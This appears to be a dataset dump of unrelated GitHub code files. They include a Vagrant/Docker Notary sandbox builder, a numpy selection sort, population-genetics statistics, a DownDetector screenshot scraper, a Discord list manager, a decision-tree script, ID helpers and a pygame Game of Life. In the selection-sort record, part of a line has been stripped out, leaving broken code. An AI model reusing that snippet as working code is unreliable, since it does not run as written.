+{"seq_id":"20310603720","text":"import random\nimport string\n\nfrom shutit_module import ShutItModule\n\nclass shutit_notary_trust_sandbox(ShutItModule):\n\n\n\tdef build(self, shutit):\n\t\tvagrant_image = shutit.cfg[self.module_id]['vagrant_image']\n\t\tvagrant_provider = shutit.cfg[self.module_id]['vagrant_provider']\n\t\tgui = shutit.cfg[self.module_id]['gui']\n\t\tmemory = shutit.cfg[self.module_id]['memory']\n\t\tmodule_name = 'shutit_notary_trust_sandbox_' + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(6))\n\t\tshutit.send('rm -rf /tmp/' + module_name + ' && mkdir -p /tmp/' + module_name + ' && cd /tmp/' + module_name)\n\t\tshutit.send('vagrant init ' + vagrant_image)\n\t\tshutit.send_file('/tmp/' + module_name + '/Vagrantfile','''\nVagrant.configure(2) do |config|\n config.vm.box = \"''' + vagrant_image + '''\"\n # config.vm.box_check_update = false\n # config.vm.network \"forwarded_port\", guest: 80, host: 8080\n # config.vm.network \"private_network\", ip: \"192.168.33.10\"\n # config.vm.network \"public_network\"\n # config.vm.synced_folder \"../data\", \"/vagrant_data\"\n config.vm.provider \"virtualbox\" do |vb|\n vb.gui = ''' + gui + '''\n vb.memory = \"''' + memory + '''\"\n vb.name = \"shutit_notary_trust_sandbox\"\n end\nend''')\n\t\tshutit.send('vagrant up --provider virtualbox',timeout=99999)\n\t\tshutit.login(command='vagrant ssh')\n\t\tshutit.login(command='sudo su -',password='vagrant')\n\t\tshutit.install('apt-transport-https')\n\t\tshutit.install('ca-certificates') \n\t\tshutit.send('apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D')\n\t\tshutit.send('touch /etc/apt/sources.list.d/docker.list')\n\t\tshutit.send('''cat > /etc/apt/sources.list.d/docker.list << END\ndeb https://apt.dockerproject.org/repo ubuntu-trusty main\nEND''')\n\t\tshutit.send('apt update -y')\n\t\tshutit.send('apt-cache policy docker-engine')\n\t\tshutit.install('docker-engine')\n\t\tshutit.send('curl -L https://github.com/docker/compose/releases/download/1.8.0/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose')\n\t\tshutit.send('chmod +x /usr/local/bin/docker-compose')\n\t\tshutit.send('''cat > docker-compose.yml << END\nversion: \"2\"\nservices:\n notaryserver:\n image: dockersecurity/notary_autobuilds:server-v0.3.0\n volumes:\n - notarycerts:/go/src/github.com/docker/notary/fixtures\n networks:\n - sandbox\n environment:\n - NOTARY_SERVER_STORAGE_TYPE=memory\n - NOTARY_SERVER_TRUST_SERVICE_TYPE=local\n sandboxregistry:\n image: registry:2.4.1\n networks:\n - sandbox\n container_name: sandboxregistry\n trustsandbox:\n image: docker:dind\n networks:\n - sandbox\n volumes:\n - notarycerts:/notarycerts\n privileged: true\n container_name: trustsandbox\n entrypoint: \"\"\n command: |-\n sh -c '\n cp /notarycerts/root-ca.crt /usr/local/share/ca-certificates/root-ca.crt &&\n update-ca-certificates &&\n dockerd-entrypoint.sh --insecure-registry sandboxregistry:5000'\nvolumes:\n notarycerts:\n external: false\nnetworks:\n sandbox:\n external: false\nEND''')\n\t\tshutit.send('docker-compose up -d')\n\t\tshutit.login('docker exec -it trustsandbox sh')\n\t\tshutit.pause_point('')\n\t\tshutit.send('docker pull docker/trusttest')\n\t\tshutit.send('docker tag docker/trusttest sandboxregistry:5000/test/trusttest:latest')\n\t\tshutit.send('export DOCKER_CONTENT_TRUST=1')\n\t\tshutit.send('export DOCKER_CONTENT_TRUST_SERVER=https://notaryserver:4443')\n\t\tshutit.send('docker pull 
sandboxregistry:5000/test/trusttest')\n\t\tshutit.logout()\n\t\tshutit.send('docker logs trustsandbox')\n\t\tshutit.pause_point('')\n\n\n\t\tshutit.logout()\n\t\tshutit.logout()\n\t\treturn True\n\n\tdef get_config(self, shutit):\n\t\tshutit.get_config(self.module_id,'vagrant_image',default='ubuntu/trusty64')\n\t\tshutit.get_config(self.module_id,'vagrant_provider',default='virtualbox')\n\t\tshutit.get_config(self.module_id,'gui',default='false')\n\t\tshutit.get_config(self.module_id,'memory',default='1024')\n\n\t\treturn True\n\n\tdef test(self, shutit):\n\n\t\treturn True\n\n\tdef finalize(self, shutit):\n\n\t\treturn True\n\n\tdef isinstalled(self, shutit):\n\n\t\treturn False\n\n\tdef start(self, shutit):\n\n\t\treturn True\n\n\tdef stop(self, shutit):\n\n\t\treturn True\n\ndef module():\n\treturn shutit_notary_trust_sandbox(\n\t\t'imiell.shutit_notary_trust_sandbox.shutit_notary_trust_sandbox', 1243692531.0001, \n\t\tdescription='',\n\t\tmaintainer='',\n\t\tdelivery_methods=['bash'],\n\t\tdepends=['shutit.tk.setup','shutit-library.virtualbox.virtualbox.virtualbox','tk.shutit.vagrant.vagrant.vagrant']\n\t)\n","repo_name":"ianmiell/shutit-notary-trust-sandbox","sub_path":"shutit_notary_trust_sandbox.py","file_name":"shutit_notary_trust_sandbox.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24769558476","text":"import numpy as np\nsize = int(input(\"Enter the size of array:: \"))\narr = np.random.randint(1,1000,size=size)\n#np.set_printoptions(threshold=np.inf)\nprint(\"Original array::\",arr)\ndef selection_desc(array):\n i= 0\n while iarray[max_index]:\n max_index = j\n j+=1\n swap(array,i,max_index)\n i+=1\ndef swap(array,num,num2):\n array[num],array[num2] = array[num2],array[num]\nnp.set_printoptions(threshold=np.inf)\nselection_desc(arr)\nprint(\"Sorted descending array::\",arr)\n","repo_name":"ypradhan222/mtech_code","sub_path":"ALgorithms/selection_desc.py","file_name":"selection_desc.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"15862247720","text":"import os\nimport collections\nimport dendropy\nfrom sisterbayes import model\n\nclass SisterBayesSummaryStatsCalculator(object):\n\n def __init__(self, **kwargs):\n self.output_prefix = kwargs.pop(\"output_prefix\", \"sisterbayes\")\n self.is_unfolded_site_frequency_spectrum = kwargs.pop(\"is_unfolded_site_frequency_spectrum\", False)\n self.is_calculate_single_population_sfs = kwargs.pop(\"is_calculate_single_population_sfs\", False)\n self.is_calculate_joint_population_sfs = kwargs.pop(\"is_calculate_joint_population_sfs\", True)\n self.stat_label_prefix = kwargs.pop(\"stat_label_prefix\", \"stat\")\n self.supplemental_labels = kwargs.pop(\"supplemental_labels\", None)\n self.alignment_directory_head = kwargs.pop(\"alignment_directory_head\", None)\n self.field_delimiter = kwargs.pop(\"field_delimiter\", \"\\t\")\n self.is_concatenate_loci = kwargs.pop(\"is_concatenate_loci\", False)\n self.concatenated_locus_label = kwargs.pop(\"concatenated_locus_label\", None)\n self.is_normalize = kwargs.pop(\"is_normalize\", False)\n locus_info = kwargs.pop(\"locus_info\", None)\n params = kwargs.pop(\"params\", None) # ignore\n if locus_info:\n self.model = model.SisterBayesModel(params_d=None, locus_info=locus_info,)\n else:\n self.model = None\n if kwargs:\n raise Exception(\"Unrecognized configuration entries: {}\".format(kwargs))\n self.default_state_alphabet = dendropy.new_standard_state_alphabet(\"0123456789ACGTU\", case_sensitive=False)\n\n def read_data(self, filepath, datatype, schema, taxon_namespace=None):\n if not os.path.isabs(filepath) and self.alignment_directory_head is not None:\n filepath = os.path.join(self.alignment_directory_head, filepath)\n if datatype == \"dna\":\n data = dendropy.DnaCharacterMatrix.get(\n path=filepath,\n schema=schema,\n taxon_namespace=taxon_namespace)\n elif datatype == \"standard\" or datatype == \"snp\":\n data = dendropy.StandardCharacterMatrix.get(\n path=filepath,\n schema=schema,\n taxon_namespace=taxon_namespace,\n default_state_alphabet=self.default_state_alphabet)\n return data\n\n def _process_sequences(\n self,\n results_d,\n field_name_prefix,\n sequences,\n num_genes_deme0,\n num_genes_deme1,\n nsites):\n d0_sequences = sequences[:num_genes_deme0]\n d1_sequences = sequences[num_genes_deme0:]\n assert len(d0_sequences) == num_genes_deme0\n assert len(d1_sequences) == num_genes_deme1\n assert len(sequences) == num_genes_deme0 + num_genes_deme1\n jsfs = self.folded_joint_site_frequency_spectrum(\n d0_sequences=d0_sequences,\n d1_sequences=d1_sequences,)\n for row_idx in range(len(jsfs)):\n for col_idx in range(len(jsfs[row_idx])):\n raw_count = float(jsfs[row_idx][col_idx])\n if self.is_normalize:\n result_value = float(raw_count) / nsites\n else:\n result_value = raw_count\n results_d[\"{}.{}.{}\".format(field_name_prefix, row_idx, col_idx)] = result_value\n\n def write_summary_stats(self,\n dest=None,\n results_store=None,\n is_write_header=True,\n ):\n results_d = collections.OrderedDict()\n if self.supplemental_labels:\n for key in self.supplemental_labels:\n results_d[key] = self.supplemental_labels[key]\n for lineage_pair_idx, lineage_pair in enumerate(self.model.lineage_pairs):\n if self.is_concatenate_loci:\n if self.concatenated_locus_label:\n concatenated_locus_label = self.concatenated_locus_label\n else:\n concatenated_locus_label = model.compose_concatenated_locus_label(lineage_pair)\n field_name_prefix=\"{}.{}.{}.joint.sfs\".format(\n self.stat_label_prefix,\n lineage_pair.label,\n 
concatenated_locus_label,\n )\n num_genes_deme0 = None\n num_genes_deme1 = None\n nsites = 0\n master_data = dendropy.StandardCharacterMatrix(default_state_alphabet=self.default_state_alphabet)\n for locus_idx, locus_definition in enumerate(lineage_pair.locus_definitions):\n if num_genes_deme0 is None:\n num_genes_deme0 = locus_definition.num_genes_deme0\n num_genes_deme1 = locus_definition.num_genes_deme1\n else:\n if (num_genes_deme0 != locus_definition.num_genes_deme0) or (num_genes_deme1 != locus_definition.num_genes_deme1):\n raise ValueError(\"Cannot concatenate loci if number of samples per deme vary across loci\")\n data = self.read_data(\n filepath=locus_definition.alignment_filepath,\n datatype=\"standard\",\n schema=\"fasta\",\n taxon_namespace=master_data.taxon_namespace)\n nsites += locus_definition.num_sites\n master_data.extend_sequences(data, is_add_new_sequences=True)\n sequences = master_data.sequences()\n self._process_sequences(\n results_d,\n field_name_prefix,\n sequences=sequences,\n num_genes_deme0=num_genes_deme0,\n num_genes_deme1=num_genes_deme1,\n nsites=nsites,\n )\n else:\n for locus_definition in lineage_pair.locus_definitions:\n field_name_prefix=\"{}.{}.{}.joint.sfs\".format(\n self.stat_label_prefix,\n lineage_pair.label,\n locus_definition.locus_label)\n data = self.read_data(\n filepath=locus_definition.alignment_filepath,\n datatype=\"standard\",\n schema=\"fasta\")\n sequences = data.sequences()\n self._process_sequences(\n results_d,\n field_name_prefix,\n sequences=sequences,\n num_genes_deme0=locus_definition.num_genes_deme0,\n num_genes_deme1=locus_definition.num_genes_deme1,\n nsites=locus_definition.num_sites,\n )\n if is_write_header:\n dest.write(self.field_delimiter.join(results_d.keys()))\n dest.write(\"\\n\")\n dest.write(self.field_delimiter.join(\"{}\".format(v) for v in results_d.values()))\n dest.write(\"\\n\")\n return results_d\n\n def folded_joint_site_frequency_spectrum(self,\n d0_sequences,\n d1_sequences,\n is_discard_multiple_mutation_site=True):\n deme_sequences = (d0_sequences, d1_sequences)\n # weirdly, FastsimCoal2 puts first deme second axis, i.e. columns,\n # while second deme gets put on rows\n jsfs = [[0 for i in range(len(d0_sequences)+1)] for j in range(len(d1_sequences)+1)]\n num_demes = 2\n nsites = None\n deme_site_columns = []\n for deme_idx in range(num_demes):\n deme_sites = list(zip(*(s.symbols_as_list() for s in deme_sequences[deme_idx])))\n if nsites is None:\n nsites = len(deme_sites)\n else:\n assert len(deme_sites) == nsites\n deme_site_columns.append(deme_sites)\n for site_idx in range(len(deme_site_columns[0])):\n deme_counters = []\n pooled_counter = collections.Counter()\n for deme_idx in range(num_demes):\n deme_counter = collections.Counter(deme_site_columns[deme_idx][site_idx])\n deme_counters.append(deme_counter)\n pooled_counter.update(deme_counter)\n if len(pooled_counter) == 1:\n jsfs[0][0] += 1\n continue\n majority_allele = pooled_counter.most_common(1)[0][0]\n del pooled_counter[majority_allele]\n if is_discard_multiple_mutation_site and len(pooled_counter) > 1:\n continue\n for deme_idx in range(num_demes):\n del deme_counters[deme_idx][majority_allele]\n jsfs[sum(deme_counters[1].values())][sum(deme_counters[0].values())] += 1\n return jsfs\n","repo_name":"jeetsukumaran/SisterBayes","sub_path":"src/sisterbayes/sumstats.py","file_name":"sumstats.py","file_ext":"py","file_size_in_byte":8910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32888653739","text":"import uuid\nfrom io import BytesIO\n\nimport validators\nfrom lib.common.errhelper import ErrHelper\nfrom PIL import Image\nfrom pyvirtualdisplay import Display\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nOK = \"no current problems\"\nDOWN = \"reports indicate problems\"\nWARNING = \"indicate possible problems\"\n\n\nclass DownDetector:\n \"\"\"\n A helper class for interacting with and scraping the downdetector.com website\n \"\"\"\n\n def __init__(self, output_dir=\"plugins/lib/common/tmp\", chart_wait=2, ads_wait=2):\n \"\"\"\n Initializes the DownDetector class\n :param output_dir: the directory to save the downloaded charts to\n :param chart_wait: the amount of time to wait for the chart to load\n :param ads_wait: the amount of time to wait for the ads to load\n \"\"\"\n self.output_dir = output_dir\n self.bad_characters = '\\\\/;*?\"<>$#@!|[}]{=^%'\n self.chart_wait = chart_wait\n self.ads_wait = ads_wait\n\n def chart(self, service, search=False):\n \"\"\"\n Gets the chart of a service from downdetector.com\n :param service: the service to get the chart for (e.g. \"escape-from-tarkov\")\n :param search: Defaults to False, set to True if you want to attempt to search for a service rather than an exact match on a service name - (e.g. \"escape from tarkav\" - with a typo)\n :return file_name: the path to the downloaded chart (String) - False if anything fails\n :return status: best effort guess of the status of the service (String)\n\n Note: The service can be found in the url after /status/ -> https://downdetector.com/status/escape-from-tarkov/\n\n Note: If the 'search' flag is set to True, the service will be searched for rather than a straight up GET call. 
If you can use the exact service name, it is recommended\n \"\"\"\n\n try:\n display = Display(visible=0, size=(1920, 1080))\n display.start()\n\n options = Options()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--headless\")\n options.add_argument(\"log-level=3\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\n \"user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\"\n )\n\n # Initializing webdriver for Chrome with our options\n driver = webdriver.Chrome(options=options)\n\n # If the search flag was provided, we search for the service in DownDetector\n if search:\n driver.get(\n f\"https://downdetector.com/search/?q={service.replace(' ', '+')}\"\n )\n\n # If the search flag was not provided, we attempt to go directly to the service page\n else:\n driver.get(f\"https://downdetector.com/status/{service}/\")\n\n try:\n # If we used the search flag, check the page to ensure a result was found\n if search:\n # check the search input\n if self.bad_input(service):\n # close browser\n driver.close()\n driver.quit()\n display.stop()\n return False, f\"❌ Bad search string: `{service}`\"\n\n # If the search returned no results, return None\n # dev note: the /search/ url stays if no results are found\n if \"/search/?q=\" in driver.current_url:\n return None, None\n\n # Wait for the chart to load\n WebDriverWait(driver, self.chart_wait).until(\n EC.presence_of_element_located((By.ID, \"chart-row\"))\n )\n except TimeoutException:\n # If the chart did not load, we have to exit\n return False, False\n\n # Wait for the ads banner to load and delete it if it does\n # NOTE: This is a hacky way to do this, but it works for now\n # If the element ID of the ads banner at the top of the DownDetector page changes, this will break\n # If the ads banner is not present, this should timeout and continue as usual\n try:\n # Wait for ads banner to load by looking for the element ID\n WebDriverWait(driver, self.ads_wait).until(\n EC.presence_of_element_located((By.ID, \"ad-leaderboard\"))\n )\n # If the ads banner is present, delete it so that we can capture a proper chart screenshot\n js_string = 'var element = document.getElementById(\"ad-leaderboard\");element.remove();'\n driver.execute_script(js_string)\n except TimeoutException:\n pass\n\n # Get the chart element\n chart_elem = driver.find_element(\n By.XPATH, \"//body/div[3]/div[2]/div[1]/div[2]/div[1]\"\n )\n\n # Get the sizes of the chart for cropping\n location = chart_elem.location\n size = chart_elem.size\n x = location[\"x\"]\n y = location[\"y\"]\n h = location[\"y\"] + size[\"height\"]\n w = location[\"x\"] + size[\"width\"]\n\n # Save the chart screenshot to memory\n p = driver.get_screenshot_as_png()\n\n # Open the captured image to crop it\n img_open = Image.open(BytesIO(p))\n\n # Crop the image\n img_crop = img_open.crop((x, y, w, h))\n\n # Save the cropped image\n # Example url https://downdetector.com/status/escape-from-tarkov/\n file_name = f\"{self.output_dir}/{service}-{uuid.uuid4()}.png\"\n img_crop.save(file_name)\n\n try:\n # Make a best effort attempt to get the status of the service from the page header\n page_header = driver.find_element(\n By.XPATH,\n \"/html[1]/body[1]/div[3]/div[2]/div[1]/div[1]/div[1]/div[1]\",\n )\n # Get the header text\n page_header_text = page_header.text.strip().lower()\n\n # Get and format the 
service name from the URL\n service_name = (\n driver.current_url.split(\"/status/\")[-1]\n .replace(\"-\", \" \")\n .replace(\"/\", \"\")\n )\n\n # Set the status based on the text of the header page\n if OK in page_header_text:\n status = f\"🟢 User reports do not indicate problems for **{service_name}**\"\n elif DOWN in page_header_text:\n status = f\"🔴 User reports indicate problems for **{service_name}**\"\n elif WARNING in page_header_text:\n status = f\"🟡 User reports indicate possible problems for **{service_name}**\"\n else:\n # unknown status, maybe DownDetector changed their page layout\n status = f\"❓ The status of **{service_name}** is unknown due to a processing error\"\n except:\n status = f\"❓ The status of **{service_name}** is unknown due to a processing error\"\n\n # close browser\n driver.close()\n driver.quit()\n display.stop()\n\n return file_name, status\n\n except Exception as error:\n ErrHelper().capture(error)\n\n # close browser in the case of an error\n driver.close()\n driver.quit()\n display.stop()\n\n return False, \"❌ A critical error occurred while trying to get the chart\"\n\n def bad_input(self, data):\n \"\"\"\n Helper function to check if provided data is 'bad'\n Bad could be data that is not a valid search string or malicious\n :param data: data to check (String)\n :return bool: true if bad data - false otherwise\n \"\"\"\n # If the provided input is a URL, it is bad\n if validators.url(data):\n return True\n\n # Check against our 'bad_characters' list\n for sub_string in self.bad_characters:\n if sub_string in data:\n # If a 'bad character' is found, return true\n return True\n\n # Add more check here...\n\n return False\n","repo_name":"GrantBirki/errbot","sub_path":"src/errbot/plugins/lib/common/down_detector.py","file_name":"down_detector.py","file_ext":"py","file_size_in_byte":8821,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"}
+{"seq_id":"27686435831","text":"import os\n\n\ndef make_user_database(p):\n path = (str(p)[:5])\n print(path)\n is_exist = os.path.exists(\"data/\"+path)\n print(is_exist)\n if is_exist:\n message = \"Masz już swoją bazę, nie mogę utworzyć drugiej!\"\n if not is_exist:\n os.makedirs(\"data/\"+path)\n message = \"Utworzyłem dla Ciebie własną bazę - możesz tworzyć już swoje listy!\"\n return message\n\n\ndef check_user_database(p):\n path = (str(p)[:5])\n is_exist = os.path.exists(\"data/\" + path)\n if not is_exist:\n message = \"Nie widzę Twojej bazy - przed działaniem musisz ją utworzyć komendą .make_base\"\n return message\n if is_exist:\n return path\n\n\ndef checklist(dire, p):\n if p is None:\n p = 'main'\n print(p.isalnum())\n if p.isalnum() is False:\n message = \"Nie ma takiej listy - podano znaki niealfanumeryczne!\"\n code = 2\n return [message, code]\n p = p.lower()\n is_exist = os.path.exists(\"data/\"+dire+'/'+p+'.txt')\n if not is_exist:\n message = \"Nie ma takiej listy - musisz ją utworzyć komendą .add_list\"\n code = 1\n else:\n message = \"Widzę taką listę - zabieram się do działania!\"\n code = 0\n return [message, code]\n\n\ndef add_list(dire, p):\n a = checklist(dire, p)[1]\n if a == 2:\n message = checklist(dire, p)[0]\n return message\n if a == 0:\n message = \"Taka lista już istnieje - nadpisz ją używając odpowiedniej komendy!\"\n return message\n else:\n print(\"Type of dire:\"+str(type(dire)))\n print(\"Type of p:\" + str(type(p)))\n if p is None:\n p = \"main\"\n with open(\"data/\"+dire+\"/\"+p+'.txt', 'a') as f1:\n f1.write('p\\n')\n f1.close()\n with open(\"data/\" + dire + \"/main.txt\", 'r') as f2:\n line1 = f2.readline()\n f2.close()\n print(line1)\n message = \"Nie znalazłem takiej listy więc już ją tworzę!\"\n if line1 == 'p\\n':\n with open(\"data/\" + dire + \"/main.txt\", 'w') as f2:\n if p == \"main\":\n pass\n else:\n f2.write(p + '\\n')\n f2.close()\n else:\n with open(\"data/\"+dire+\"/main.txt\", 'a') as f2:\n if p == \"main\":\n pass\n else:\n f2.write(p+'\\n')\n f2.close()\n return message\n\n\ndef copy_list(dire, p, c):\n if p is None or c is None:\n message = \"Nie podano mi wystarczająco argumentów!\"\n return message\n a = checklist(dire, p)[1]\n z = checklist(dire, c)[1]\n if a == 2 or z == 2:\n message = checklist(dire, p)[0]\n return message\n if z == 0:\n message = \"Lista podana jako nowa nazwa już istnieje jako lista!\"\n return message\n if a == 0:\n with open(\"data/\"+dire+\"/\"+p+'.txt', 'r') as f1:\n lines1 = f1.readlines()\n f1.close()\n with open(\"data/\"+dire+\"/\"+c+'.txt', 'a') as f2:\n for i in lines1:\n f2.write(i)\n f2.close()\n message = \"Skopiowałem listę \"+p+\" do \"+c+\"!\"\n return message\n else:\n message = \"Nie mogę skopiować listy która nie istnieje!\"\n return message\n\n\ndef remove_list(dire, p):\n if p is None:\n message = \"Nie podano mi którą listę usunąć!\"\n return message\n a = checklist(dire, p)[1]\n if a == 2:\n message = checklist(dire, p)[0]\n return message\n if a == 0:\n os.remove(\"data/\"+dire+\"/\"+p+'.txt')\n message = \"Usunąłem listę \"+p+\"!\"\n with open(\"data/\" + dire + \"/main.txt\", 'r') as f1:\n lines1 = f1.readlines()\n f1.close()\n with open(\"data/\" + dire + \"/main.txt\", 'w') as f2:\n for index, title in enumerate(lines1, start=1):\n if title != p+\"\\n\":\n f2.write(title)\n f2.close()\n else:\n message = \"Nie ma takiej listy!\"\n return message\n\n\ndef get_list(name):\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n f1.close()\n return lines1\n\n\ndef 
parse_multiple_into_one(amount, li):\n onemes = \"List:\\n\"\n for i in range(amount):\n onemes += (str(i + 1) + \". \" + li[i])\n return onemes\n\n\ndef add_to_list(name, addon):\n name = name.lower()\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n f1.close()\n if lines1[0] == \"p\\n\":\n with open(name + '.txt', 'w') as f1:\n f1.write(addon+'\\n')\n f1.close()\n else:\n with open(name + '.txt', 'a') as f1:\n f1.write(addon+'\\n')\n f1.close()\n\n\ndef remove_from_list(name, line):\n name = name.lower()\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n print(len(lines1))\n f1.close()\n if int(line) > len(lines1):\n message = \"Lista ma tylko \"+str(len(lines1))+\" wpisów!\"\n return message\n with open(name + '.txt', 'w') as f2:\n for index, title in enumerate(lines1, start=1):\n if index != int(line):\n f2.write(title)\n f2.close()\n message = \"Usunięto wpis!\"\n return message\n","repo_name":"Sedarius-1/Wahabot","sub_path":"fad.py","file_name":"fad.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"16758367422","text":"#-*- coding: utf-8 -*-\n#构建并测试CART决策树模型\n\nimport pandas as pd #导入数据分析库\n\n\nquchu = u'F:/data/去除第一次样本集.csv'\nzengrong = u'F:/data/1.csv'\njianrong = u'F:/data/2.csv'\njianronghuifu = u'F:/data/3.csv'\nzanting = u'F:/data/4.csv'\nzantinghuifu = u'F:/data/5.csv'\ndata = pd.read_csv(zanting,encoding='gbk') #读取数据,数据的前三列是特征,第四列是标签\ndeal = {u'年初':1,u'年中':2,u'年末':3}\ndata[u'阶段'] = data[u'阶段'].map(lambda x : deal[x])\ntrain = data[data[u'申请执行月'] < 201602][u'是否容量变更']\ntest = data[data[u'申请执行月'] > 201602][u'是否容量变更']\ntest = test.tolist()\ntrain = train.tolist()\n# data = (data - data.mean(axis=0)) / (data.std(axis=0))\ntrain_data = data[data[u'申请执行月'] < 201602]\ntest_data = data[data[u'申请执行月'] > 201602]\ndel train_data[u'申请执行月']\ndel test_data[u'申请执行月']\ntrain_data = train_data.as_matrix()\ntest_data = test_data.as_matrix()\ntrain_data = (train_data - train_data.mean(axis=0)) / (train_data.std(axis=0))\ntest_data = (test_data - test_data.mean(axis=0)) / (test_data.std(axis=0))\n\n\n#构建CART决策树模型\nfrom sklearn.tree import DecisionTreeClassifier #导入决策树模型\n\ntree = DecisionTreeClassifier() #建立决策树模型\ntree.fit(train_data[:,:2], train) #训练\n\n#保存模型\n# from sklearn.externals import joblib\n# joblib.dump(tree, treefile)\n\nfrom prediction.cm_plot import * #导入自行编写的混淆矩阵可视化函数\ncm_plot(test, tree.predict(test_data[:,:2])).show() #显示混淆矩阵可视化结果\n#注意到Scikit-Learn使用predict方法直接给出预测结果。\n\nfrom sklearn.metrics import roc_curve #导入ROC曲线函数\nimport matplotlib.pyplot as plt\nfpr, tpr, thresholds = roc_curve(test, tree.predict_proba(test_data[:,:2])[:,1], pos_label=1)\nplt.plot(fpr, tpr, linewidth=2, label = 'ROC of CART', color = 'green') #作出ROC曲线\nplt.xlabel('False Positive Rate') #坐标轴标签\nplt.ylabel('True Positive Rate') #坐标轴标签\nplt.ylim(0,1.05) #边界范围\nplt.xlim(0,1.05) #边界范围\nplt.legend(loc=4) #图例\nplt.show() #显示作图结果","repo_name":"braveld/PythonProgram","sub_path":"after_classified/decision_tree_yongdian.py","file_name":"decision_tree_yongdian.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"14731021857","text":"import hashlib\nimport random\nimport string\nimport time\nimport uuid\n\n\ndef gen_uuid():\n return str(uuid.uuid1())\n\n\ndef gen_id(node_type=''):\n if node_type == 'UNKNOWN':\n return None\n\n s = ''.join(random.sample(string.ascii_lowercase, 10))\n t = ''.join([s, random_date(), gen_uuid()])\n m = hashlib.md5()\n m.update(bytes(str(t)))\n ran_id = m.hexdigest()\n return ''.join([node_type, ran_id])\n\n\ndef random_date():\n a1 = (2000, 1, 1, 0, 0, 0, 0, 0, 0)\n a2 = (2018, 12, 31, 23, 59, 59, 0, 0, 0)\n\n start = time.mktime(a1)\n end = time.mktime(a2)\n\n t = random.randint(start, end)\n date_tuple = time.localtime(t)\n date = time.strftime(\"%Y-%m-%d\", date_tuple)\n return date\n\n\ndef random_int():\n return random.randint(10000, 10000000)\n\n\ndef random_index(rate):\n start = 0\n index = 0\n rand_num = random.randint(1, sum(rate))\n\n for index, scope in enumerate(rate):\n start += scope\n if rand_num <= start:\n break\n return index\n","repo_name":"jimxiang/knowledgemap","sub_path":"guarantee_relation/util/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36059604305","text":"import pygame\nimport sys\nimport time\n\nfrom game import step\nfrom game import print_grid\nfrom game import insert_life\nfrom game import BASE\nfrom game import create_grid\nfrom game import ALIVE, DEAD\n\n\nclass Rectangle(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__()\n self.image = pygame.Surface([100, 100])\n self.image.fill((0, 0, 0))\n self.rect = self.image.get_rect()\n self.rect.topleft = [pos_x, pos_y]\n\n\n# Grid Setup\ngrid = create_grid()\nl1 = [15, 26, 34, 35, 36]\ninsert_life(grid, l1)\n# grid = play(grid)\nprint_grid(grid, BASE)\n\n# General Setup\npygame.init()\nclock = pygame.time.Clock()\n\n# Game Screen\nscreen_width = 1000\nscreen_height = 1000\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Sprite Animation\")\n\n# Creating the sprites and groups\nmoving_sprites = pygame.sprite.Group()\n\n\ndef pygame_step(grid, moving_sprites):\n moving_sprites.empty()\n for i in range(100):\n if grid[i] == ALIVE:\n j = i % BASE\n rectangle_tmp = Rectangle(j * BASE * BASE, (i-j) * BASE)\n moving_sprites.add(rectangle_tmp)\n print(i)\n print(j, \" \", i-j)\n print()\n\n\n# mainloop\n\"\"\"i = 0\nj = 0\"\"\"\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n \"\"\"rectangle1.rect.topleft = [i, j*10]\n i += 1\n if i % 1000 == 0:\n i = 0\n j += 1\n print(i)\"\"\"\n\n pygame_step(grid, moving_sprites)\n grid = step(grid)\n\n screen.fill((0, 255, 255))\n moving_sprites.draw(screen)\n pygame.display.flip()\n\n # clock.tick(1000000)\n time.sleep(0.5)","repo_name":"lilAndy-bruh/Game_of_Life","sub_path":"pygame_intro.py","file_name":"pygame_intro.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
